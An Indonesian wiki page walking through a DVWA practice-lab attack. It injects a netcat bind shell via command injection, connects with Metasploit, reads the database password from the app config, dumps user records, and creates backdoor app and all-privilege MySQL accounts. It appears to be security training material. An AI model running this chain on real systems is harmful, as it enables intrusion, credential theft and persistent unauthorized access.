Difference between revisions of "DVWA: Exploit menggunakan Metasploit"

Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html

Persiapan

Masuk ke DVWA, misalnya

http://192.168.0.80/DVWA-1.9

username admin
password password

Klik

DVWA Security > Security Level Low > Submit

Siapkan NetCat

Masuk ke DVWA Command Injection, lakukan

192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

Dimana 192.168.0.100 adalah IP address server DVWA

Gunakan metasploit

Jalankan

msfconsole thankyou

Lakukan

use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.0.100
exploit

Cek password

whoami
grep apache /etc/passwd
grep apache /etc/group

Cek Password melalui konfigurasi Web

ps -eaf | grep http
pwd
ls -ld /var/www/html
ls -ld /var/www/html/DVWA*
ls -l /var/www/html/DVWA*

Cari password database

ls -l /var/www/html/dvwa/config
cat /var/www/html/dvwa/config/config.inc.php

Explorasi database

echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD

Buat user baru

echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD

Lihat informasi tabel MySQL

echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD

Buat user MySQL yang baru

echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD
echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD

Referensi

• https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html